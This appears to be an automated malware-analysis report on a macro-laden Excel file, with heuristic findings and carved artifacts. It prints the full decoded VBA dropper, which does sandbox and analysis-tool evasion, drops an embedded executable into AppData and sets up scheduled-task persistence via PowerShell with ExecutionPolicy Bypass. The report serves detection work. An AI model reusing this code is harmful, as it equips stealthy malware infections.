Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 90cc9ffc7ebec5ef…

MALICIOUS

Office (OOXML) / .XLSX

428.0 KB Created: 2026-01-08 23:46:48 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2026-06-21
MD5: 67f742920329e7b10679b68121fcf1f4 SHA-1: 94bdbb0d2bbdc9c6233c001efb2bced80afccf75 SHA-256: 90cc9ffc7ebec5ef9988358604a88b7229fb7b8e6fb802e050274c65b087a07c
318 Risk Score

Heuristics 11

  • VBA project inside OOXML medium 7 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
    ret = dvyfvuzwcy.Run("powershell.exe -NoProfile -ExecutionPolicy Bypass -File """ & tempPsFile & """", eycejkjhfr, True)
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set wmi = GetObject(obirpbolbnuwqwt("77696e6d676d74733a5c5c2e5c726f6f745c63696d") & obirpbolbnuwqwt("7632"))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    CreateObject(obirpbolbnuwqwt("5368656c6c2e4170") & obirpbolbnuwqwt("706c69636174696f6e")) _
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set wmi = GetObject(obirpbolbnuwqwt("77696e6d676d74733a5c5c2e5c726f6f745c63696d") & obirpbolbnuwqwt("7632"))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    feurxjazcfyb = Environ("TEMP") & "\update.log"
  • Embedded OLE object medium OOXML_OLE_OBJECT
    Document contains an embedded OLE object
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 6

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 17986 bytes
SHA-256: 1a80a91e2beabebd746c0064d840d4e0c918c695c51c6d59e38279ddff818531
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Const ivmhxzop = 2
Const otqmymogpnwrzdbjga = 1
Const eycejkjhfr = 0
Sub Auto_Open()
Dim feurxjazcfyb As String
feurxjazcfyb = Environ("TEMP") & "\update.log"
If Len(Dir(feurxjazcfyb)) > 0 Then
Call ckxvbaqbjuqszvcfvz
Exit Sub
End If
If ezwkjlogadppqhoauu() Then
Call ckxvbaqbjuqszvcfvz
Else
MsgBox obirpbolbnuwqwt("5468652066696c6520697320636f7272757074656420616e642063616e6e6f7420626520") & obirpbolbnuwqwt("6f70656e65642e"), vbCritical
Exit Sub
End If
End Sub
Function ezwkjlogadppqhoauu() As Boolean
Dim wmi As Object
Dim hklguusqvyrlualolso As Integer
Dim availableMemory As Double
Dim totalDiskSpace As Double
Dim systemDrive As String
Dim oqrzsquqflk As Object
Dim lcgrvlwfmfqc As Variant
lcgrvlwfmfqc = Array(obirpbolbnuwqwt("636973") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("636d64") & obirpbolbnuwqwt("76697274682e657865"), obirpbolbnuwqwt("616c697665") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("66696c657761746368657273657276696365") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("6e67766d7376") & obirpbolbnuwqwt("632e657865"), obirpbolbnuwqwt("73616e64626f78696572706373732e") & obirpbolbnuwqwt("657865"), _
obirpbolbnuwqwt("616e") & obirpbolbnuwqwt("616c797a65722e657865"), obirpbolbnuwqwt("666f7274697472616365") & obirpbolbnuwqwt("722e657865"), obirpbolbnuwqwt("6e7376657263746c") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("73626965") & obirpbolbnuwqwt("6374726c2e657865"), obirpbolbnuwqwt("616e67") & obirpbolbnuwqwt("6172322e657865"), obirpbolbnuwqwt("676f61746361737065722e") & obirpbolbnuwqwt("657865"), _
obirpbolbnuwqwt("6f6c6c796462672e") & obirpbolbnuwqwt("657865"), obirpbolbnuwqwt("7362") & obirpbolbnuwqwt("69657376632e657865"), obirpbolbnuwqwt("6170696d6f6e69746f72") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("476f6174436c69") & obirpbolbnuwqwt("656e744170702e657865"), obirpbolbnuwqwt("7065") & obirpbolbnuwqwt("69642e657865"), obirpbolbnuwqwt("7363") & obirpbolbnuwqwt("616e686f73742e657865"), _
obirpbolbnuwqwt("6170697370792e") & obirpbolbnuwqwt("657865"), obirpbolbnuwqwt("6869657733322e") & obirpbolbnuwqwt("657865"), obirpbolbnuwqwt("7065") & obirpbolbnuwqwt("726c2e657865"), obirpbolbnuwqwt("73636b") & obirpbolbnuwqwt("746f6f6c2e657865"), obirpbolbnuwqwt("61706973") & obirpbolbnuwqwt("707933322e657865"), obirpbolbnuwqwt("686f6f") & obirpbolbnuwqwt("6b616e616170702e657865"), obirpbolbnuwqwt("7065746f6f") & obirpbolbnuwqwt("6c732e657865"), _
obirpbolbnuwqwt("7364636c742e") & obirpbolbnuwqwt("657865"), obirpbolbnuwqwt("617375") & obirpbolbnuwqwt("72612e657865"), obirpbolbnuwqwt("686f6f6b65") & obirpbolbnuwqwt("78706c6f7265722e657865"), obirpbolbnuwqwt("706578") & obirpbolbnuwqwt("706c6f7265722e657865"), obirpbolbnuwqwt("7366") & obirpbolbnuwqwt("746463632e657865"), obirpbolbnuwqwt("6175746f7265706775692e65") & obirpbolbnuwqwt("7865"), obirpbolbnuwqwt("68747470") & obirpbolbnuwqwt("6c6f672e657865"), _
obirpbolbnuwqwt("7069") & obirpbolbnuwqwt("6e672e657865"), obirpbolbnuwqwt("73687574646f776e6d") & obirpbolbnuwqwt("6f6e2e657865"), obirpbolbnuwqwt("617574") & obirpbolbnuwqwt("6f72756e732e657865"), obirpbolbnuwqwt("69636573") & obirpbolbnuwqwt("776f72642e657865"), obirpbolbnuwqwt("70723063") & obirpbolbnuwqwt("3378702e657865"), obirpbolbnuwqwt("736e6966666869742e65") & obirpbolbnuwqwt("7865"), _
obirpbolbnuwqwt("6175746f72756e73") & obirpbolbnuwqwt("632e657865"), obirpbolbnuwqwt("69636c6963") & obirpbolbnuwqwt("6b65722d72656c656173652e657865"), obirpbolbnuwqwt("707269") & obirpbolbnuwqwt("6e63652e657865"), obirpbolbnuwqwt("736e6f6f") & obirpbolbnuwqwt("702e657865"), obirpbolbnuwqwt("6175746f73637265656e73686f74746572") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("696461672e65") & obirpbolbnuwqwt("7865"), _
obirpbolbnuwqwt("70726f63616e616c797a") & obirpbolbnuwqwt("65722e657865"), obirpbolbnuwqwt("73706b726d6f6e") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("6176637465737473") & obirpbolbnuwqwt("756974652e657865"), obirpbolbnuwqwt("696461673634") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("70726f6365") & obirpbolbnuwqwt("73736861636b65722e657865"), obirpbolbnuwqwt("737973") & obirpbolbnuwqwt("616e616c797a65722e657865"), _
obirpbolbnuwqwt("6176") & obirpbolbnuwqwt("7a2e657865"), obirpbolbnuwqwt("696461") & obirpbolbnuwqwt("712e657865"), obirpbolbnuwqwt("70726f636573736d656d64756d702e") & obirpbolbnuwqwt("657865"), obirpbolbnuwqwt("7379736572") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("626568617669") & obirpbolbnuwqwt("6f7264756d7065722e657865"), obirpbolbnuwqwt("696d6d756e697479") & obirpbolbnuwqwt("64656275676765722e657865"), _
obirpbolbnuwqwt("70726f63657870") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("73797374656d6578") & obirpbolbnuwqwt("706c6f7265722e657865"), obirpbolbnuwqwt("62696e64696666") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("696d706f72747265") & obirpbolbnuwqwt("632e657865"), obirpbolbnuwqwt("70726f6365") & obirpbolbnuwqwt("787036342e657865"), obirpbolbnuwqwt("73797374") & obirpbolbnuwqwt("656d6578706c6f726572736572766963652e657865"), _
obirpbolbnuwqwt("4254505472617949636f6e") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("696d") & obirpbolbnuwqwt("756c2e657865"), obirpbolbnuwqwt("70726f636d6f6e2e65") & obirpbolbnuwqwt("7865"), obirpbolbnuwqwt("737974686f6e2e65") & obirpbolbnuwqwt("7865"), obirpbolbnuwqwt("636170747572656261742e") & obirpbolbnuwqwt("657865"), obirpbolbnuwqwt("496e666f63") & obirpbolbnuwqwt("6c69656e742e657865"), obirpbolbnuwqwt("70726f636d6f") & obirpbolbnuwqwt("6e36342e657865"), _
obirpbolbnuwqwt("7461736b6d6772") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("6364") & obirpbolbnuwqwt("622e657865"), obirpbolbnuwqwt("696e7374616c6c726974652e") & obirpbolbnuwqwt("657865"), obirpbolbnuwqwt("707974686f6e") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("7461736c6f6769") & obirpbolbnuwqwt("6e2e657865"), obirpbolbnuwqwt("6366") & obirpbolbnuwqwt("666578706c6f7265722e657865"), obirpbolbnuwqwt("697066732e65") & obirpbolbnuwqwt("7865"), _
obirpbolbnuwqwt("707974686f6e") & obirpbolbnuwqwt("772e657865"), obirpbolbnuwqwt("74637064") & obirpbolbnuwqwt("756d702e657865"), obirpbolbnuwqwt("636c69636b73686172656c") & obirpbolbnuwqwt("61756e636865722e657865"), obirpbolbnuwqwt("6970726f7365746d6f6e69") & obirpbolbnuwqwt("746f722e657865"), obirpbolbnuwqwt("71712e65") & obirpbolbnuwqwt("7865"), obirpbolbnuwqwt("746370766965772e65") & obirpbolbnuwqwt("7865"), _
obirpbolbnuwqwt("636c6f") & obirpbolbnuwqwt("7365706f7075702e657865"), obirpbolbnuwqwt("69726167") & obirpbolbnuwqwt("656e742e657865"), obirpbolbnuwqwt("717166666f2e") & obirpbolbnuwqwt("657865"), obirpbolbnuwqwt("71717072") & obirpbolbnuwqwt("6f746563742e657865"), obirpbolbnuwqwt("746f74") & obirpbolbnuwqwt("616c636d642e657865"), obirpbolbnuwqwt("63706f727473") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("6a6f65") & obirpbolbnuwqwt("626f78636f6e74726f6c2e657865"), _
obirpbolbnuwqwt("71717367") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("74726f6a6469652e6b767063726f737366") & obirpbolbnuwqwt("6972652e657865"), obirpbolbnuwqwt("6a6f65626f") & obirpbolbnuwqwt("787365727665722e657865"), obirpbolbnuwqwt("726170746f72636c69") & obirpbolbnuwqwt("656e742e657865"), obirpbolbnuwqwt("7478") & obirpbolbnuwqwt("706c6174666f726d2e657865"), obirpbolbnuwqwt("646e662e65") & obirpbolbnuwqwt("7865"), _
obirpbolbnuwqwt("6c616d6572") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("7265676d6f6e") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("76697275732e") & obirpbolbnuwqwt("657865"), obirpbolbnuwqwt("64736e6966662e65") & obirpbolbnuwqwt("7865"), obirpbolbnuwqwt("4c6f67485454") & obirpbolbnuwqwt("502e657865"), obirpbolbnuwqwt("72656773686f") & obirpbolbnuwqwt("742e657865"), obirpbolbnuwqwt("7678") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("64756d706361702e65") & obirpbolbnuwqwt("7865"), _
obirpbolbnuwqwt("6c6f7264") & obirpbolbnuwqwt("70652e657865"), obirpbolbnuwqwt("5265704d67723634") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("77696e616c79") & obirpbolbnuwqwt("7369732e657865"), obirpbolbnuwqwt("656d756c2e") & obirpbolbnuwqwt("657865"), obirpbolbnuwqwt("6d616c6d6f6e2e") & obirpbolbnuwqwt("657865"), obirpbolbnuwqwt("526570") & obirpbolbnuwqwt("5574696c7333322e657865"), obirpbolbnuwqwt("77696e6170696f7665727269646533322e") & obirpbolbnuwqwt("657865"), _
obirpbolbnuwqwt("657468657265") & obirpbolbnuwqwt("616c2e657865"), obirpbolbnuwqwt("6d62") & obirpbolbnuwqwt("6172756e2e657865"), obirpbolbnuwqwt("52657055782e65") & obirpbolbnuwqwt("7865"), obirpbolbnuwqwt("77696e6462") & obirpbolbnuwqwt("672e657865"), obirpbolbnuwqwt("6574746572636170") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("6d64706d6f") & obirpbolbnuwqwt("6e2e657865"), obirpbolbnuwqwt("72756e") & obirpbolbnuwqwt("73616d706c652e657865"), _
obirpbolbnuwqwt("77696e64756d702e65") & obirpbolbnuwqwt("7865"), obirpbolbnuwqwt("66616b65687474") & obirpbolbnuwqwt("707365727665722e657865"), obirpbolbnuwqwt("6d6d72") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("7361") & obirpbolbnuwqwt("6d7031652e657865"), obirpbolbnuwqwt("7769") & obirpbolbnuwqwt("6e7370792e657865"), obirpbolbnuwqwt("66616b6573") & obirpbolbnuwqwt("65727665722e657865"), obirpbolbnuwqwt("73616d") & obirpbolbnuwqwt("706c652e657865"), _
obirpbolbnuwqwt("776972657368") & obirpbolbnuwqwt("61726b2e657865"), obirpbolbnuwqwt("6c676875625f6167656e742e65") & obirpbolbnuwqwt("7865"), obirpbolbnuwqwt("4465") & obirpbolbnuwqwt("6c6c4f7074696d697a65722e657865"), obirpbolbnuwqwt("466964646c") & obirpbolbnuwqwt("65722e657865"), obirpbolbnuwqwt("6d756c74") & obirpbolbnuwqwt("69706f742e657865"), obirpbolbnuwqwt("73616e64626f786965") & obirpbolbnuwqwt("63727970746f2e657865"), obirpbolbnuwqwt("5858582e65") & obirpbolbnuwqwt("7865"), obirpbolbnuwqwt("66696c656d6f6e") & obirpbolbnuwqwt("2e657865"), obirpbolbnuwqwt("6e6574736e") & obirpbolbnuwqwt("69666665722e657865"), _
obirpbolbnuwqwt("73616e64626f7869656463") & obirpbolbnuwqwt("6f6d6c61756e63682e657865"))
On Error Resume Next
Set wmi = GetObject(obirpbolbnuwqwt("77696e6d676d74733a5c5c2e5c726f6f745c63696d") & obirpbolbnuwqwt("7632"))
systemDrive = wmi.ExecQuery(obirpbolbnuwqwt("53656c6563742053797374656d4472697665") & obirpbolbnuwqwt("2066726f6d2057696e33325f4f7065726174696e6753797374656d")).ItemIndex(0).systemDrive
systemDrive = Left(systemDrive, ivmhxzop)
hklguusqvyrlualolso = wmi.ExecQuery(obirpbolbnuwqwt("53656c656374204e756d6265724f664c6f676963616c50726f636573736f7273") & obirpbolbnuwqwt("2066726f6d2057696e33325f436f6d707574657253797374656d")).ItemIndex(0).NumberOfLogicalProcessors
If hklguusqvyrlualolso < 2 Then
MsgBox obirpbolbnuwqwt("5468652066696c6520697320636f727275") & obirpbolbnuwqwt("7074656420616e642063616e6e6f74206265206f70656e65642e"), vbCritical
ezwkjlogadppqhoauu = False
Exit Function
End If
totalMemory = wmi.ExecQuery(obirpbolbnuwqwt("53656c65637420546f74616c50") & obirpbolbnuwqwt("6879736963616c4d656d6f72792066726f6d2057696e33325f436f6d707574657253797374656d")).ItemIndex(0).TotalPhysicalMemory / (1024 ^ 2)
If totalMemory < 2048 Then
MsgBox obirpbolbnuwqwt("5468652066696c6520697320636f7272757074656420616e") & obirpbolbnuwqwt("642063616e6e6f74206265206f70656e65642e"), vbCritical
ezwkjlogadppqhoauu = False
Exit Function
End If
Set oqrzsquqflk = wmi.ExecQuery(obirpbolbnuwqwt("53656c6563742053697a652066") & obirpbolbnuwqwt("726f6d2057696e33325f4c6f676963616c4469736b2077686572652044657669636549443d27") & systemDrive & obirpbolbnuwqwt("27")).ItemIndex(0)
totalDiskSpace = oqrzsquqflk.Size / (1024 ^ 3)
If totalDiskSpace < 40 Then
MsgBox obirpbolbnuwqwt("5468652066696c6520697320636f727275") & obirpbolbnuwqwt("7074656420616e642063616e6e6f74206265206f70656e65642e"), vbCritical
ezwkjlogadppqhoauu = False
Exit Function
End If
Dim hjinjwbapt, pf, hasPagefile
hasPagefile = False
Set hjinjwbapt = wmi.ExecQuery(obirpbolbnuwqwt("53656c656374202a2066726f6d2057696e33325f") & obirpbolbnuwqwt("5061676546696c655573616765"))
For Each pf In hjinjwbapt
If pf.AllocatedBaseSize > 0 Then
hasPagefile = True
Exit For
End If
Next
If Not hasPagefile Then
Set hjinjwbapt = wmi.ExecQuery(obirpbolbnuwqwt("53656c65637420") & obirpbolbnuwqwt("2a2066726f6d2057696e33325f5061676546696c6553657474696e67"))
For Each pf In hjinjwbapt
If pf.InitialSize > 0 Or pf.MaximumSize > 0 Then
hasPagefile = True
Exit For
End If
Next
End If
If Not hasPagefile Then
MsgBox obirpbolbnuwqwt("5468652066696c6520697320636f7272757074656420616e642063616e6e6f74206265206f") & obirpbolbnuwqwt("70656e65642e"), vbCritical
ezwkjlogadppqhoauu = False
Exit Function
End If
If etdqcxwznwkhkcjab(lcgrvlwfmfqc) Then
MsgBox obirpbolbnuwqwt("5468652066696c6520697320636f7272") & obirpbolbnuwqwt("757074656420616e642063616e6e6f74206265206f70656e65642e"), vbCritical
ezwkjlogadppqhoauu = False
Exit Function
End If
ezwkjlogadppqhoauu = True
End Function
Function etdqcxwznwkhkcjab(lcgrvlwfmfqc As Variant) As Boolean
Dim wmi As Object
Dim qikmyiu As Object
Dim ocpvunrgopfme As Object
Dim etyhovem As Integer
On Error Resume Next
Set wmi = GetObject(obirpbolbnuwqwt("77696e6d676d74733a5c5c2e5c726f6f745c6369") & obirpbolbnuwqwt("6d7632"))
Set qikmyiu = wmi.ExecQuery(obirpbolbnuwqwt("53656c") & obirpbolbnuwqwt("656374202a2066726f6d2057696e33325f50726f63657373"))
For Each ocpvunrgopfme In qikmyiu
For etyhovem = LBound(lcgrvlwfmfqc) To UBound(lcgrvlwfmfqc)
If LCase(ocpvunrgopfme.Name) = LCase(lcgrvlwfmfqc(etyhovem)) Then
etdqcxwznwkhkcjab = True
Exit Function
End If
Next etyhovem
Next ocpvunrgopfme
etdqcxwznwkhkcjab = False
End Function
Sub ckxvbaqbjuqszvcfvz()
Dim wsbggvik As String
Dim kzudnlzwvprgq As String
Dim brwpqchaoycwx As Object
Dim tcnkqfxaae As String
Dim tswkqwaxfwhlnasu As String
Dim yjlkpilcesxkob As String
Dim hqpoldzgoeks As String
Dim ocwipptbo As String
ActiveSheet.OLEObjects(obirpbolbnuwqwt("4f626a656374") & obirpbolbnuwqwt("2031")).Copy
CreateObject(obirpbolbnuwqwt("5368656c6c2e4170") & obirpbolbnuwqwt("706c69636174696f6e")) _
.Namespace(ActiveWorkbook.Path) _
.Self.InvokeVerb obirpbolbnuwqwt("5061") & obirpbolbnuwqwt("737465")
filePath = ActiveWorkbook.Path & obirpbolbnuwqwt("5c696d616765") & obirpbolbnuwqwt("2e6a7067")
appDataPath = CreateObject(obirpbolbnuwqwt("57536372697074") & obirpbolbnuwqwt("2e5368656c6c")).SpecialFolders(obirpbolbnuwqwt("417070") & obirpbolbnuwqwt("44617461"))
ocwipptbo = appDataPath & obirpbolbnuwqwt("5c4d") & obirpbolbnuwqwt("534f66666963655c")
If Dir(ocwipptbo, vbDirectory) = "" Then
MkDir ocwipptbo
Else
Kill filePath
Exit Sub
End If
yjlkpilcesxkob = ocwipptbo & obirpbolbnuwqwt("6d7373757362") & obirpbolbnuwqwt("2e657865") '
FileCopy filePath, yjlkpilcesxkob
Set brwpqchaoycwx = CreateObject(obirpbolbnuwqwt("575363726970742e") & obirpbolbnuwqwt("5368656c6c"))
wsbggvik = obirpbolbnuwqwt("5570646174655461736b4d61") & obirpbolbnuwqwt("6368696e65")
hqpoldzgoeks = obirpbolbnuwqwt("737461") & obirpbolbnuwqwt("7274")
tempPsFile = Environ("TEMP") & "\CreateTask_" & Format(Now, "yyyymmdd_hhnnss") & "_" & Int((10000) * Rnd) & ".ps1"
psCommand = obirpbolbnuwqwt("696620282d4e6f7420284765742d53") & obirpbolbnuwqwt("63686564756c65645461736b202d5461736b4e616d652027") & wsbggvik & obirpbolbnuwqwt("27202d4572726f72416374696f6e2053696c656e746c79436f6e74696e7565") & obirpbolbnuwqwt("2929207b") & vbCrLf & _
obirpbolbnuwqwt("2020202024737461727454696d65203d20284765742d44617465292e4164644d696e757465732832") & obirpbolbnuwqwt("39292e546f537472696e67282748483a6d6d2729") & vbCrLf & _
obirpbolbnuwqwt("2020202024616374696f6e203d204e65772d5363686564756c65645461736b416374696f6e202d45") & obirpbolbnuwqwt("7865637574652027") & yjlkpilcesxkob & obirpbolbnuwqwt("27202d417267756d656e74") & obirpbolbnuwqwt("2027") & hqpoldzgoeks & obirpbolbnuwqwt("27202d576f") & obirpbolbnuwqwt("726b696e674469726563746f72792027") & ocwipptbo & obirpbolbnuwqwt("27") & vbCrLf & _
obirpbolbnuwqwt("202020202474726967") & obirpbolbnuwqwt("676572203d204e65772d5363686564756c65645461736b54726967676572202d4461696c79202d41742024737461727454696d65") & vbCrLf & _
obirpbolbnuwqwt("2020202052656769737465722d5363686564756c65645461736b202d5461736b4e616d") & obirpbolbnuwqwt("652027") & wsbggvik & obirpbolbnuwqwt("27202d416374696f6e2024616374696f6e202d5472") & obirpbolbnuwqwt("6967676572202474726967676572202d466f726365") & vbCrLf & _
obirpbolbnuwqwt("7d")
Dim hcilhwqdsq As Object, qgobpqrvuqfrzpta As Object
Set hcilhwqdsq = CreateObject(obirpbolbnuwqwt("5363726970") & obirpbolbnuwqwt("74696e672e46696c6553797374656d4f626a656374"))
Set qgobpqrvuqfrzpta = hcilhwqdsq.CreateTextFile(tempPsFile, True, True)
qgobpqrvuqfrzpta.Write psCommand
qgobpqrvuqfrzpta.Close
Set dvyfvuzwcy = CreateObject(obirpbolbnuwqwt("5753") & obirpbolbnuwqwt("63726970742e5368656c6c"))
ret = dvyfvuzwcy.Run("powershell.exe -NoProfile -ExecutionPolicy Bypass -File """ & tempPsFile & """", eycejkjhfr, True)
On Error Resume Next
hcilhwqdsq.DeleteFile tempPsFile, True
On Error GoTo 0
Kill filePath
MsgBox obirpbolbnuwqwt("5468652066696c65") & obirpbolbnuwqwt("20697320636f7272757074656420616e642063616e6e6f74206265206f70656e65642e2e2e"), vbCritical
End Sub

Attribute VB_Name = "Module2"
Function obirpbolbnuwqwt(ByVal rrgefcwyo As String) As String
Dim meixyemazt As Long
For meixyemazt = 1 To Len(rrgefcwyo) Step 2
obirpbolbnuwqwt = obirpbolbnuwqwt & Chr$(Val("&H" & Mid$(rrgefcwyo, meixyemazt, 2)))
Next meixyemazt
End Function
ooxml_oleobject_00.bin ooxml-ole-object OOXML embedded OLE part: xl/embeddings/oleObject1.bin 712192 bytes
SHA-256: 946f6e3740b6ef6b1b60d6846106d3c344004dfc6f4449de20e4aceb81c5f3c5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.52, consistent with packed or encrypted content.
ooxml_oleobject_00_ole10native_00.bin ole-package OOXML xl/embeddings/oleObject1.bin Ole10Native stream: Ole10Native 705064 bytes
SHA-256: 469a118471823de22f32b701d2905c009363f301d64c4bc2b44de5fc039703bf
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.55, consistent with packed or encrypted content.
ooxml_oleobject_00_ole10native_00_image.jpg ole-package-payload OOXML xl/embeddings/oleObject1.bin Ole10Native payload: display_name=image.jpg; full_path=C:\Users\Admin\AppData\Local\Temp\{32BE8721-87BE-47B5-92DC-D829BA01C4E7}\image.jpg; temp_path=; def_file= 704512 bytes
SHA-256: 3a6c25a26bee9a24c83b670feae67118fc7ec15ab4786aaf6a9a77df6aa8f71a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.55, consistent with packed or encrypted content.
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 38400 bytes
SHA-256: b4af8305c5e9da8629f52d1872854d73aa4e5a4b4b29dc9510e09b2ea12a365a
emf_00.emf ooxml-emf OOXML EMF part: xl/media/image1.emf 4988 bytes
SHA-256: 47b36d4917a574120d2728674abc24e9796871c1fc19eca067ce81eca3058888

Open this report in the interactive analyzer, or submit your own file for analysis.